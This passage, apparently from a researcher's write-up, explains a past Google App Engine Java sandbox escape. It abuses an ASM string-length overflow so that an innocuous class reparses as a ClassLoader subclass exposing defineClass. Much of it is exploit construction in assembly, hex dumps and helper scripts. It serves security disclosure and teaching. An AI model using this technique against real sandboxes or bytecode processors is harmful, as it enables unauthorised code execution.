In this example, you can see that the ldc instruction points to constant pool entry 1 which is a string that in turn points to constant pool entry 21, which contains the string data ‘Hello World!’.

ASM’s transformations

Since I was too lazy to figure out how App Engine’s bytecode rewriting might mangle my carefully crafted classes, and a real attacker wouldn’t have the source code anyway, I decided to write the exploit as a completely innocuous class that wouldn’t trigger any of the bytecode transformation passes (and then turns into malicious code following the integer overflow in the serializer).

However, even with no bytecode transformations applied, parsing a classfile with ASM and then writing it back out is not a no-op. This is because ASM parses the input into a high-level in-memory representation of the code that does not preserve low-level details of the original classfile, such as constant pool ordering.

Instead, ASM walks through the in-memory data structures during serialization, creating constant pool entries as it goes (and deduplicating identical constants). For example, consider the following assembly:

.class public HelloWorld
.super java/lang/Object


.const [1] = String "duplicated string"
.const [2] = String "duplicated string"
.const [3] = String "Thing 1"
.const [4] = String "Thing 2"

.method public static woodlelyDoodlely : ()V
    .code stack 99 locals 99
        ldc "This is a string"
        ldc 42

        ldc [1]
        ldc [2]

        ldc [4]
        ldc [3]

        return
    .end code
.end method

Here we have a class that just loads a few constants and does nothing else. We have two constant pool entries containing the same data, as well as two strings that are “out of order”: we told Krakatau to put “Thing 1” first in the constant pool, but the instruction to load “Thing 2” comes first in the actual code.

We can assemble and then disassemble this class to see the details of the classfile that Krakatau generated, containing both the constant pool entries we explicitly defined, as well as implicitly generated constants.

Note that when you reference a string literal in bytecode, that instruction points to a String constant, which in turn points to a Utf8 constant containing the actual data. The String entries for “Thing 1” and “Thing 2” appear at indexes 3 and 4 respectively as requested, while the underlying Utf8 entries appear in the opposite order.

.version 49 0
.const [1] = String [17]
.const [2] = String [17]
.const [3] = String [16]
.const [4] = String [15]
.const [5] = String [14]
.const [6] = Int 42
.const [7] = Class [13]
.const [8] = Class [12]
.const [9] = Utf8 woodlelyDoodlely
.const [10] = Utf8 ()V
.const [11] = Utf8 Code
.const [12] = Utf8 java/lang/Object
.const [13] = Utf8 HelloWorld
.const [14] = Utf8 'This is a string'
.const [15] = Utf8 'Thing 2'
.const [16] = Utf8 'Thing 1'
.const [17] = Utf8 'duplicated string'

.class public [7]
.super [8]

.method public static [9] : [10]
    .attribute [11] .code stack 99 locals 99
L0:     ldc [5]
L2:     ldc [6]
L4:     ldc [1]
L6:     ldc [2]
L8:     ldc [4]
L10:    ldc [3]
L12:    return
L13:
    .end code
.end method
.end class

Now let’s put it through ASM (with no transformations, just parsing and re-serialization), and disassemble the result to see what changed:

.version 49 0
.const [1] = Utf8 HelloWorld
.const [2] = Class [1]
.const [3] = Utf8 java/lang/Object
.const [4] = Class [3]
.const [5] = Utf8 woodlelyDoodlely
.const [6] = Utf8 ()V
.const [7] = Utf8 'This is a string'
.const [8] = String [7]
.const [9] = Int 42
.const [10] = Utf8 'duplicated string'
.const [11] = String [10]
.const [12] = Utf8 'Thing 2'
.const [13] = String [12]
.const [14] = Utf8 'Thing 1'
.const [15] = String [14]
.const [16] = Utf8 Code

.class public [2]
.super [4]

.method public static [5] : [6]
    .attribute [16] .code stack 99 locals 99
L0:     ldc [8]
L2:     ldc [9]
L4:     ldc [11]
L6:     ldc [11]
L8:     ldc [13]
L10:    ldc [15]
L12:    return
L13:
    .end code
.end method
.end class

As you can see, we have the same constants as before, but in a completely different order. “Thing 2” now comes before “Thing 1”, and the two entries for “duplicated string” have been merged into one.

What this means is that the actual encoding of the file we send to App Engine doesn’t matter at all (except for the literal null bytes in the string constant of course). All that matters is the order that ASM will write out the constants after transforming the class. Luckily, this is simple and predictable - ASM just walks the code in order, top to bottom, and appends an entry to the constant pool whenever it sees a reference to a constant that doesn’t match anything already added to the constant pool.
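To make the ordering rule concrete, here is a toy Python model of it. This is not ASM's code, just a sketch that reproduces the ordering seen in the disassembly above, under the assumption that entries are appended on first use and the Code attribute name is added once the method body has been visited. The function `asm_like_pool` is hypothetical, and it only handles String and Int constants.

```python
def asm_like_pool(class_name, super_name, method_name, descriptor, loaded):
    """Return constant pool entries in first-use order (list slot i is index i + 1)."""
    pool = []   # pool[i] holds the entry at constant pool index i + 1
    seen = {}   # entry -> index, used to deduplicate identical constants

    def add(entry):
        if entry not in seen:
            pool.append(entry)
            seen[entry] = len(pool)
        return seen[entry]

    def utf8(text):
        return add(("Utf8", text))

    add(("Class", utf8(class_name)))
    add(("Class", utf8(super_name)))
    utf8(method_name)
    utf8(descriptor)
    for value in loaded:                 # one constant per ldc, in code order
        if isinstance(value, str):
            add(("String", utf8(value)))
        else:
            add(("Int", value))
    utf8("Code")                         # attribute name, added after the code
    return pool

pool = asm_like_pool(
    "HelloWorld", "java/lang/Object", "woodlelyDoodlely", "()V",
    ["This is a string", 42, "duplicated string", "duplicated string",
     "Thing 2", "Thing 1"],
)
for number, entry in enumerate(pool, start=1):
    print(number, entry)
```

Running it on the constants from the example gives the same 16 entries, in the same order, as the ASM output above, which is the property the exploit depends on.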

Constant pool encoding

In the binary classfile format, the constant pool is encoded as a two byte field giving the number of constants, followed by the constant data. This is not an array, because the size of each constant is variable, depending on the type of the constant (and in the case of strings, the length of the string). Instead, the parser just keeps parsing constants until it reaches the count value and succeeds, or reaches the end of the file and/or invalid data and rejects the classfile.

In order to tell the parser how to parse the variable sized constant data entries, each constant pool entry is encoded as a tag byte, followed by the data for that constant in a format dependent on the type. For example, an Int constant is encoded as the tag byte 03, followed by four bytes of data giving the integer value. Likewise, a Long constant is encoded as the tag byte 05, followed by eight bytes of data.

A more complicated example is the Utf8 constant (which, despite its name, actually stores MUTF-8 encoded string data). A Utf8 constant is encoded as the tag byte 01, followed by a two byte length field, and then that many bytes of encoded string data.

To see how this works, let’s create a class containing the Utf8 constant “evilstring” and nothing else:

.class [0]
.super [0]
.const [1] = Utf8 "evilstring"

Then we can assemble it with Krakatau and look at the generated classfile in a hex editor as shown below.

Note: Normally, a classfile will contain other stuff - at the very minimum, it needs a constant pool entry to store the name of the class itself. However, I set the class and superclass to [0], i.e. null, here in order to avoid cluttering up the example. This is not actually valid - in fact, I had to specifically modify Krakatau to accept this example for the sake of illustration.

00000000: cafe babe 0000 0031 0002 0100 0a65 7669  .......1.....evi
00000010: 6c73 7472 696e 6700 0000 0000 0000 0000  lstring.........
00000020: 0000 0000 00                             .....

Here we can see the constant pool count field (0002, because it is actually one more than the number of constant pool entries), followed by our “evilstring” constant, 0100 0a65 7669 6c73 7472 696e 67. We have the tag byte for a Utf8 constant, 01, followed by the two byte string length field, 00 0a, followed by the string data, 65 7669 6c73 7472 696e 67, which is the ASCII encoding for “evilstring”.

Now let’s try it with multiple constants:

.class [6]
.super [0]
.const [1] = Utf8 "evilstring"
.const [2] = String [1]
.const [3] = Int 0x77778888
.const [4] = Long 0x0123456789ABCDEFL
.const [6] = Class [1]

00000000: cafe babe 0000 0031 0007 0100 0a65 7669  .......1.....evi
00000010: 6c73 7472 696e 6708 0001 0377 7788 8805  lstring....ww...
00000020: 0123 4567 89ab cdef 0700 0100 0000 0600  .#Eg............
00000030: 0000 0000 0000 0000 00                   .........

Here, we have the constant pool count field 0007, followed by our “evilstring” constant (0100 0a65 7669 6c73 7472 696e 67) as before. This time, we followed it by a String constant, which uses the tag byte 08, followed by a constant pool index pointing to Utf8 data (0001 here, since our Utf8 constant is at index 1 in the constant pool). (Recall that when you reference a string literal in bytecode, that points to the String constant, rather than the underlying Utf8 constant.)

Next, we have the Int constant 0377 7788 88, consisting of the tag byte 03 followed by the four bytes of integer data (for our 0x77778888). Then we have the Long constant 05 0123 4567 89ab cdef, which is similar.

Lastly, I added a Class constant with the name “evilstring”. Similar to String constants, Class constants are just a tag byte (07), followed by the index of the underlying Utf8 data (00 01 in this case). I also added it to the .class directive at the start, so this example will actually assemble with an unmodified Krakatau, resulting in a class named “evilstring”.

There’s one other oddity here - Long and Double constants count as two constant pool entries, for reasons that must have seemed like a good idea back in 1996. Therefore, the next constant following our Long constant at index 4 is at index 6 rather than 5 as you might have expected.
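The encoding rules so far are simple enough to reproduce in a few lines of Python. The sketch below is only an illustration: `encode_pool` is a made-up helper, it supports just the five constant types used in this example, and it assumes ASCII-only Utf8 data.

```python
import struct

def encode_pool(entries):
    """Encode (kind, value) constants as the count field followed by the entries."""
    out = bytearray()
    slots = 0
    for kind, value in entries:
        if kind == "Utf8":
            data = value.encode("ascii")   # ASCII only; real classfiles use MUTF-8
            out += b"\x01" + struct.pack(">H", len(data)) + data
        elif kind == "Int":
            out += b"\x03" + struct.pack(">I", value)
        elif kind == "Long":
            out += b"\x05" + struct.pack(">Q", value)
            slots += 1                     # a Long occupies two pool slots
        elif kind == "Class":
            out += b"\x07" + struct.pack(">H", value)
        elif kind == "String":
            out += b"\x08" + struct.pack(">H", value)
        else:
            raise ValueError("unsupported constant kind: " + kind)
        slots += 1
    # The count field is one more than the number of slots.
    return struct.pack(">H", slots + 1) + bytes(out)

encoded = encode_pool([
    ("Utf8", "evilstring"),
    ("String", 1),
    ("Int", 0x77778888),
    ("Long", 0x0123456789ABCDEF),
    ("Class", 1),
])
print(encoded.hex())
```

The output matches the bytes in the hex dump above from the 0007 count field through the final 0700 01, including the extra slot consumed by the Long.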

Overflow for fun and profit

In order to avoid worrying about it getting mangled by the bytecode rewriting passes, the class we send to ASM will be completely innocuous. It will look something like this:

public class Exploit {
    public int woodlelyDoodlely() {
        "evilstring";
        42;
        0x12345678;
        "some"; "other"; "constants";
        return 0;
    }
}

All it contains is a single method that loads a bunch of constants and does absolutely nothing, so the bytecode rewriting won’t change anything before it gets re-serialized by ASM. The magic happens when ASM’s serializer overflows the string length field, resulting in a classfile containing the actual exploit code we want.

However, actually setting this up is a bit complicated, so before we get into the process of writing the actual exploit, here’s an illustration of how overflow can completely change the meaning of a class, using a much simpler example.

.class [0]
.super [0]
.const [1] = Utf8 "evilstring"

Let’s take the minimal example from before, but pretend that instead of writing out the correct length (000a), the length field overflows to 0 (0000). In reality, we’d need to add thousands of null bytes to the string to make it overflow, but that would make the example unmanageably large and hard to read, so we’re just pretending that “evilstring” itself overflows for the sake of example.

00000000: cafe babe 0000 0031 0002 0100 0065 7669  .......1.....evi
00000010: 6c73 7472 696e 6700 0000 0000 0000 0000  lstring.........
00000020: 0000 0000 00                             .....

When the JVM parses this class, it starts parsing constants at the 01 as before. It sees this is a Utf8 constant and reads the length field to see how many bytes to read for the string. However, this time, the length field is 0000 instead of 000a, resulting in just an empty string constant. Having completed parsing of the constant pool, the JVM then starts parsing whatever is next in the classfile, starting at the 65 byte (the “e” in “evilstring”).

The overall structure of the classfile is as follows:

ClassFile {
    u4             magic;
    u2             minor_version;
    u2             major_version;
    u2             constant_pool_count;
    cp_info        constant_pool[constant_pool_count-1];
    u2             access_flags;
    u2             this_class;
    u2             super_class;
    u2             interfaces_count;
    u2             interfaces[interfaces_count];
    u2             fields_count;
    field_info     fields[fields_count];
    u2             methods_count;
    method_info    methods[methods_count];
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}

The next thing after the constant pool is access_flags, a bitmask that gives the flags for the class (public, private, etc.). In this case, the bytes 65 76 decode to the flags private protected final super volatile native abstract annotation enum, which is not a valid combination of flags, so the classfile is rejected.

Now let’s try adding the bytes 10 01 to the beginning of “evilstring”. That corresponds to the access flags synthetic and public. The synthetic flag is a meaningless flag set by the Java compiler to indicate code that was generated implicitly by the compiler rather than part of the Java source, but we can put it on anything we want ourselves - it doesn’t affect execution. I included it here in order to avoid the high byte of our injected access_flags being null.

.class [0]
.super [0]
.const [1] = Utf8 "\x10\x01evilstring"

00000000: cafe babe 0000 0031 0002 0100 0010 0165  .......1.......e
00000010: 7669 6c73 7472 696e 6700 0000 0000 0000  vilstring.......
00000020: 0000 0000 0000 00                        .......
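Decoding a flags value by hand gets tedious, so here is a small Python sketch that does it. The bit names follow the generic labels used in the text above. Several bits mean different things depending on whether they appear on a class, field, or method, so treat the `FLAG_NAMES` table as illustrative rather than authoritative.

```python
# Bit values from the classfile format, with generic names.
FLAG_NAMES = [
    (0x0001, "public"), (0x0002, "private"), (0x0004, "protected"),
    (0x0008, "static"), (0x0010, "final"), (0x0020, "super"),
    (0x0040, "volatile"), (0x0080, "transient"), (0x0100, "native"),
    (0x0200, "interface"), (0x0400, "abstract"), (0x0800, "strict"),
    (0x1000, "synthetic"), (0x2000, "annotation"), (0x4000, "enum"),
]

def decode_flags(value):
    """Return the names of all flag bits set in a u2 access_flags value."""
    return [name for bit, name in FLAG_NAMES if value & bit]

print(decode_flags(0x6576))   # the "ev" in "evilstring"
print(decode_flags(0x1001))   # the two bytes we prepended
```

The first call lists the nine conflicting flags mentioned earlier, and the second gives just public and synthetic.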

Now parsing of access_flags succeeds and the parser moves on to this_class, a two byte index into the constant pool, pointing to the Class constant representing the class contained in this classfile. The parser again sees the 65 76 (the “ev” in “\x10\x01evilstring”), and fails, since 65 76 (25974 in decimal) is higher than the maximum constant pool index (1, since we only defined one constant).

Now, let’s create an actual Class constant (named “Foo”) for this_class to refer to, and then try to add its index (00 02) to the beginning of evilstring so the parser can parse this_class. Evilstring is now “\x10\x01\x00\x02evilstring”.

.class [2]
.super [0]

.const [1] = Utf8 "Foo"
.const [2] = Class [1]
.const [3] = Utf8 "\x10\x01\x00\x02evilstring"

00000000: cafe babe 0000 0031 0004 0100 0346 6f6f  .......1.....Foo
00000010: 0700 0101 0000 1001 c080 0265 7669 6c73  ...........evils
00000020: 7472 696e 6700 0000 0200 0000 0000 0000  tring...........
00000030: 0000 00                                  ...

The parser successfully parses 1001 as access_flags, then moves on to parse c080 as this_class… wait, what? We added “\x00\x02” to our string, but recall that the string data is MUTF-8 encoded. This means that the null byte is encoded as the two byte sequence c080, so the 0002 we tried to inject turned into c080 02. Obviously, c080 (decimal 49280) is higher than the max constant index (3 now), so parsing fails again.
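For reference, here is a minimal Python sketch of the MUTF-8 encoding rules: it works on UTF-16 code units, encodes U+0000 as two bytes, and never emits four-byte sequences. The helper `mutf8_encode` is written for this illustration only and is not taken from Krakatau or ASM.

```python
def mutf8_encode(text):
    """Encode text as the modified UTF-8 used inside classfiles."""
    out = bytearray()
    # Work on UTF-16 code units so that supplementary characters become
    # surrogate pairs, each of which is encoded separately as three bytes.
    units = text.encode("utf-16-be", "surrogatepass")
    for i in range(0, len(units), 2):
        unit = (units[i] << 8) | units[i + 1]
        if 0x0001 <= unit <= 0x007F:
            out.append(unit)                       # plain ASCII, one byte
        elif unit <= 0x07FF:                       # includes U+0000 -> c0 80
            out += bytes([0xC0 | (unit >> 6), 0x80 | (unit & 0x3F)])
        else:
            out += bytes([0xE0 | (unit >> 12),
                          0x80 | ((unit >> 6) & 0x3F),
                          0x80 | (unit & 0x3F)])
    return bytes(out)

print(mutf8_encode("\x10\x01\x00\x02evilstring").hex())
```

The printed bytes start with 1001 c080 02, matching the hex dump: the single null character we asked for has become two non-null bytes.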

One solution is to add enough constant pool entries so that the constants reach index 257 (0101 in hex), so we can refer to them from inside the injected string data without using null bytes. We’ll actually use this technique in the exploit later, but for now, let’s look at a different technique that we’ll also use later in the exploit, specifically Int and Long constants.

.class [2]
.super [0]

.const [1] = Utf8 "Foo"
.const [2] = Class [1]
.const [3] = Utf8 "\x03evilstring"
.const [4] = Utf8 "whatever"

Here we have two changes - evilstring is now just “\x03evilstring”, and we added an extra constant after evilstring.

00000000: cafe babe 0000 0031 0005 0100 0346 6f6f  .......1.....Foo
00000010: 0700 0101 0000 0365 7669 6c73 7472 696e  .......evilstrin
00000020: 6701 0008 7768 6174 6576 6572 0000 0002  g...whatever....
00000030: 0000 0000 0000 0000 0000                 ..........

Now, the constant pool count field is 0005 rather than 0004. This means that when the parser gets to the 0365 (the beginning of our new evilstring), instead of trying to parse it as access_flags, it instead tries to parse it as the fourth constant pool entry. 03 is the tag byte of an Int constant, which is followed by an arbitrary four bytes giving the integer value. Therefore, the parser takes the following four bytes, 65 7669 6c (the “evil” in “\x03evilstring”), and sets index 4 of the constant pool to the integer 0x6576696c.

Then it tries to parse access_flags starting at the bytes 73 74 (the “st” in evilstring), which is of course once again a bunch of invalid gibberish. However, we can continue this process by adding another fake tag.

.class [2]
.super [4]

.const [1] = Utf8 "Foo"
.const [2] = Class [1]
.const [3] = Utf8 "java/lang/Object"
.const [4] = Class [3]
.const [5] = Utf8 "java/lang/ClassLoader"
.const [6] = Class [5]
.const [7] = Utf8 "\x03evil\x05string"
.const [8] = Long 0x7700010002000600L
.const [10] = Utf8 "whatever"

00000000: cafe babe 0000 0031 000b 0100 0346 6f6f  .......1.....Foo
00000010: 0700 0101 0010 6a61 7661 2f6c 616e 672f  ......java/lang/
00000020: 4f62 6a65 6374 0700 0301 0015 6a61 7661  Object......java
00000030: 2f6c 616e 672f 436c 6173 734c 6f61 6465  /lang/ClassLoade
00000040: 7207 0005 0100 0003 6576 696c 0573 7472  r.......evil.str
00000050: 696e 6705 7700 0100 0200 0600 0100 0877  ing.w..........w
00000060: 6861 7465 7665 7200 0000 0200 0400 0000  hatever.........
00000070: 0000 0000 00                             .....

I added a 05 byte between the “evil” and “string” in evilstring, and also added some more Class constants we can use for the superclass. In this case, we’ll magically change the superclass from the harmless java/lang/Object to the evil java/lang/ClassLoader.

This time, with more constants added after the evilstring, the parser won’t stop parsing constants after parsing the 0365 7669 6c in evilstring as the Int constant 0x6576696c. Instead, it moves on to the next byte, which is 05, the tag byte for a Long constant. Long constants contain eight bytes of arbitrary data for the long value (rather than the four for integers), so this skips over the next eight bytes.

In this case, the next eight bytes are 73 7472 696e 6705 77, consisting of the “string” in evilstring, followed by the tag byte (05) and first content byte (77) of the constant Long 0x7700010002000600L which comes after evilstring.

At that point, we’ve filled all 10 constant pool slots (the count field, 000b, is one more than the number of slots), so the parser continues by parsing the next two bytes of Long 0x7700010002000600L (0001) as access_flags, which results in just the flag public (no need to add synthetic here, since integer constants can contain null bytes without any problem).

After that, it parses this_class (0002) followed by super_class (0006). In this case, the parsed superclass (6) points to java/lang/ClassLoader, rather than java/lang/Object like the original classfile did. We now have a classfile that appears harmless (inheriting from Object), but which turns evil (inheriting from ClassLoader) after the string overflow.

After that, of course, the parser moves on to parsing interfaces_count and interfaces, which fails due to garbage data, but hopefully you get the idea. In the actual exploit, we will need to carefully feed ASM enough constants to produce an entire valid classfile when parsed with the string overflow.
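The walkthrough above can be checked with a tiny parser. The Python sketch below is not how the JVM does it. It is a stripped-down reader (the names `parse_header` and `class_name` are invented here) that understands only the five constant tags used in this post and stops after super_class. The input is the hex dump above, copied row by row.

```python
import struct

def parse_header(data):
    """Parse the constant pool and the three u2 fields that follow it."""
    count = struct.unpack_from(">H", data, 8)[0]
    pos, index, pool = 10, 1, {}
    while index < count:
        tag = data[pos]
        if tag == 1:                                   # Utf8: u2 length + bytes
            length = struct.unpack_from(">H", data, pos + 1)[0]
            pool[index] = ("Utf8", data[pos + 3:pos + 3 + length])
            pos += 3 + length
        elif tag == 3:                                 # Int: four bytes
            pool[index] = ("Int", struct.unpack_from(">I", data, pos + 1)[0])
            pos += 5
        elif tag == 5:                                 # Long: eight bytes, two slots
            pool[index] = ("Long", struct.unpack_from(">Q", data, pos + 1)[0])
            pos += 9
            index += 1
        elif tag in (7, 8):                            # Class / String: u2 index
            kind = "Class" if tag == 7 else "String"
            pool[index] = (kind, struct.unpack_from(">H", data, pos + 1)[0])
            pos += 3
        else:
            raise ValueError("unsupported tag %d at offset %d" % (tag, pos))
        index += 1
    flags, this_cls, super_cls = struct.unpack_from(">HHH", data, pos)
    return pool, flags, this_cls, super_cls

def class_name(pool, index):
    """Resolve a Class constant to the text of its Utf8 name."""
    return pool[pool[index][1]][1].decode("ascii")

dump = bytes.fromhex(
    "cafe babe 0000 0031 000b 0100 0346 6f6f"
    "0700 0101 0010 6a61 7661 2f6c 616e 672f"
    "4f62 6a65 6374 0700 0301 0015 6a61 7661"
    "2f6c 616e 672f 436c 6173 734c 6f61 6465"
    "7207 0005 0100 0003 6576 696c 0573 7472"
    "696e 6705 7700 0100 0200 0600 0100 0877"
    "6861 7465 7665 7200 0000 0200 0400 0000"
    "0000 0000 00"
)
pool, flags, this_cls, super_cls = parse_header(dump)
print(hex(flags), class_name(pool, this_cls), class_name(pool, super_cls))
```

With the zeroed length field, the reader reports a public class Foo whose superclass resolves to java/lang/ClassLoader, even though the trailing bytes of the file still name index 4 (java/lang/Object) as the superclass.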

Exploit writing time!

At long last, we’re ready to craft the exploit classfile. We want something equivalent to this Java code after being processed by ASM and then reparsed by the JVM with the string overflow:

import java.security.ProtectionDomain;

public class Exploit extends ClassLoader {
    public Class sneakyLoad(String name, byte[] b, ProtectionDomain pd) {
        return this.defineClass(name, b, 0, b.length, pd);
    }
}

This corresponds to the following bytecode:

.class public Exploit
.super java/lang/ClassLoader

.method public sneakyLoad : (Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;
    .code stack 99 locals 99
        aload_0
        aload_1
        aload_2
        iconst_0
        aload_2
        arraylength
        aload_3
        invokevirtual Method Exploit defineClass (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;
        areturn
    .end code
.end method

.method public <init> : ()V
    .code stack 99 locals 99
        aload_0
        invokespecial Method java/lang/ClassLoader <init> ()V
        return
    .end code
.end method
.end class

You may be wondering why the bytecode has two methods when the Java code only had one. The answer is that we need a constructor in order to instantiate the class. In Java, if you don’t include a constructor, the compiler will automatically generate one for you, but in bytecode you have to be explicit. In bytecode, constructors are just methods with the special name <init>, so the second method here is equivalent to the following Java code (which is all implicit in Java):

    public Exploit() {
        super();
        return;
    }

In the previous section, we used Krakatau to manually create a classfile with a specific constant pool in order to demonstrate how the overflow bug affects parsing. However, in the actual App Engine, the JVM will never directly see anything we create. Instead, we create a class with a specific sequence of ldc (load constant) instructions, which will then cause ASM to output the desired constants into the constant pool (which then gets reparsed as malicious code following the string overflow).

As shown in the previous section, there are two main ways to inject data into the constant pool: Utf8 constants and Long constants. Utf8 has the advantage of allowing you to inject up to ~65k bytes at once, but the encoded string data can’t contain null bytes, which is a severe disadvantage, since many places in the classfile format effectively require null bytes. (Additionally, every byte above 127 has to be part of a valid unicode sequence, but that’s easier to work around.)

Long constants only allow us to inject eight bytes at a time, but those can include null bytes. The problem is that every 9th byte has to be the tag byte (05). For this exploit, we’ll just be using a single Utf8 constant to hide some strings and constants we don’t want ASM to see, and use Long constants to construct the rest of the classfile, thanks to their increased flexibility. However, this does mean we have to Tetris them in and carefully figure out which points in the classfile can afford to have a 05 byte stuffed in.

Recall that the overall format for a classfile is as follows:

ClassFile {
    u4             magic;
    u2             minor_version;
    u2             major_version;
    u2             constant_pool_count;
    cp_info        constant_pool[constant_pool_count-1];
    u2             access_flags;
    u2             this_class;
    u2             super_class;
    u2             interfaces_count;
    u2             interfaces[interfaces_count];
    u2             fields_count;
    field_info     fields[fields_count];
    u2             methods_count;
    method_info    methods[methods_count];
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}

We only have to worry about the part after the constant pool. We’ll set access_flags to 0001 (public), and we don’t have any interfaces, fields, or attributes (at the class level anyway, more on attributes later) so we can set those counts to 0. We’ll have two methods (sneakyLoad and <init>) so methods_count is 2.

Therefore, the classfile so far looks like this, where [foo] are placeholders to be filled in with the relevant constant pool index later, and $foo are other placeholders.

access_flags 0001
this_class [this_cls]
super_class [super_cls]
interfaces_count 0000
fields_count 0000
methods_count 0002
methods $method1 $method2
attributes_count 0000

Putting that together, we get 0001 [this_cls] [super_cls] 0000 0000 0002 $method1 $method2 0000 so far.

The format for a method is as follows:

method_info {
    u2             access_flags;
    u2             name_index;
    u2             descriptor_index;
    u2             attributes_count;
    attribute_info attributes[attributes_count];
}

We’ll handle the first method (sneakyLoad) first, since it is more complicated, and <init> will be very similar.

A method without any bytecode is not very interesting. Curiously, though, the code is not stored directly as part of the method_info structure. Instead, it is stored in an attribute of the method, named Code.

There are several places in the classfile format where attributes can be added (specifically, at class level, on methods and fields, and on Code attributes). At its most basic, an attribute is just a name, a length field, and then a bunch of data that depends on the type of attribute.

Attributes can have any name. The classfile format defines several dozen standard attributes with specific names and formats that affect the class. Any attributes with names that aren’t on the list of standard attributes will be treated as opaque binary blobs and skipped over by the parser.

For our purposes, the only standard attribute that matters is the Code attribute, which can appear only on a method and contains the bytecode for that method. The format of a Code attribute is as follows:

Code_attribute {
    u2 attribute_name_index;
    u4 attribute_length;
    u2 max_stack;
    u2 max_locals;
    u4 code_length;
    u1 code[code_length];
    u2 exception_table_length;
    {   u2 start_pc;
        u2 end_pc;
        u2 handler_pc;
        u2 catch_type;
    } exception_table[exception_table_length];
    u2 attributes_count;
    attribute_info attributes[attributes_count];
}

Every attribute begins with attribute_name_index and attribute_length. The latter tells the parser how many bytes to skip over if the attribute is not recognized as a standard attribute and thus has an unknown format.

max_stack and max_locals tell the JVM how much space to allow for the operand stack and local variable table respectively of this method. A tool like ASM or the Java compiler will calculate the maximum stack and locals actually used by the method’s bytecode to fill in these fields, but this is sometimes a pain to do when writing bytecode by hand.

Luckily, there’s no penalty for providing limits that are higher than necessary here, so I usually just fill them in with arbitrary values that are higher than necessary, like 99 in all the above examples.

Note: Theoretically, the most flexible option when writing bytecode by hand is to just set them both to 65535, the maximum possible. However, in my experience, this usually causes the JVM to crash when actually running your code, due to allocating excessively large stack frames in interpreted mode and running out of stack space. Therefore, it’s best to set them to a small, but still excessive value like 99.

Next up, we have code_length and code, which is just the actual bytecode for the method. Recall that the code for sneakyLoad in Krakatau assembly syntax looks like this:

.method public sneakyLoad : (Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;
    .code stack 99 locals 99
        aload_0
        aload_1
        aload_2
        iconst_0
        aload_2
        arraylength
        aload_3
        invokevirtual Method Exploit defineClass (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;
        areturn
    .end code
.end method

Each line between .code and .end code represents one instruction in the bytecode. Most bytecode instructions are one byte, but the invokevirtual instruction is three bytes - one byte for the opcode followed by two for the constant pool index pointing to the corresponding Method constant.

Luckily, we don’t have to bother looking up the opcodes for these instructions ourselves, we can just use Krakatau to generate the bytecode by running it on the above code. The result is 2A 2B 2C 03 2C BE 2D B6[defineClass_method] B0, where [defineClass_method] is a placeholder to be filled in later with the appropriate constant pool index.
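If you want to see where those bytes come from without running an assembler, the opcode values can be looked up by hand. The Python sketch below hardcodes the eight opcodes this method needs. The `assemble` helper is made up for this post, and 0x0123 is an arbitrary stand-in for the [defineClass_method] placeholder.

```python
# Opcode values from the JVM instruction set (only the ones sneakyLoad uses).
OPCODES = {
    "iconst_0": 0x03, "aload_0": 0x2A, "aload_1": 0x2B, "aload_2": 0x2C,
    "aload_3": 0x2D, "arraylength": 0xBE, "invokevirtual": 0xB6,
    "areturn": 0xB0,
}

def assemble(instructions):
    """Turn (mnemonic, optional u2 operand) tuples into raw bytecode."""
    code = bytearray()
    for name, *operand in instructions:
        code.append(OPCODES[name])
        if operand:                        # two byte constant pool index
            code += operand[0].to_bytes(2, "big")
    return bytes(code)

DEFINE_CLASS_METHOD = 0x0123   # hypothetical index standing in for the placeholder

code = assemble([
    ("aload_0",), ("aload_1",), ("aload_2",), ("iconst_0",), ("aload_2",),
    ("arraylength",), ("aload_3",), ("invokevirtual", DEFINE_CLASS_METHOD),
    ("areturn",),
])
print(code.hex(), len(code))
```

This gives the same eleven bytes as above, with 0123 sitting where the real constant pool index will eventually go.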

Lastly, the Code attribute contains the exception table and subattributes. We’re not using those, so we’ll just set both counts to 0. The attribute_length field counts everything after the six-byte name and length header, which here is 2 + 2 + 4 + 11 + 2 + 2 = 23 bytes (00000017). Putting this together yields the following bytes for the Code attribute:

[Code_utf] 00000017 $stack $locals 0000000B 2A 2B 2C 03 2C BE 2D B6[defineClass_method] B0 0000 0000

Then we can insert this back into the method structure above. Assuming we choose access_flags = 0001 (just public) and no attributes for the method other than the code attribute, we have

$method1 = 0001 [sneakyLoad_utf] [sneakyLoad_desc_utf] 0001 [Code_utf] 00000017 $stack $locals 0000000B 2A 2B 2C 03 2C BE 2D B6[defineClass_method] B0 0000 0000

Inserting this back into the classfile gives

0001 [this_cls] [super_cls] 0000 0000 0002 0001 [sneakyLoad_utf] [sneakyLoad_desc_utf] 0001 [Code_utf] 00000017 $stack $locals 0000000B 2A 2B 2C 03 2C BE 2D B6[defineClass_method] B0 0000 0000 $method2 0000

Tiling sneakyLoad, part 1

However, we now have a problem. We have to somehow Tetris-in the Long constant tag bytes, and find a way to fit a 05 byte in every 9th byte here. Unfortunately, there are long stretches of data here where that is awkward or impossible.

There are multiple ways to break things up, but here’s the solution I came up with while recreating the exploit in the process of writing this blog post. (I don’t remember exactly how I did it back in 2013, but I do remember that I made some decisions differently, resulting in minor differences in the locations and type of tag bytes used.)

In order to make this work, we’ll have to place some constraints on the positioning of the relevant constant pool entries. To start with, we’ll constrain the lower byte of [super_cls] to be 05. This leaves the following eight bytes (0000 0000 0002 0001) free. Next, we’re at the high byte of [sneakyLoad_utf]. We could make it 05 again, but that would mean having at least 5*256 constant pool entries, which is a lot, and I wanted to keep the exploit class as small and simple as I could. Plus the positioning of the tag bytes works out better with an Int here anyway. Therefore, we’ll set the high byte of [sneakyLoad_utf] to 03, the tag byte of an Int.

This covers the next four bytes (the low byte of [sneakyLoad_utf], [sneakyLoad_desc_utf], and the high byte of the attribute count, 0001). This leaves us at the low byte of the attribute count, which we currently have as 01.

Our method only needs one attribute (the Code attribute), but 01 is not a useful tag byte. Luckily, we can add as many non-standard attributes to anything as we want, and the JVM will just ignore them, so we’ll set the attribute count to 0005 here and add four useless custom attributes in after the Code attribute to let the tiling process continue.

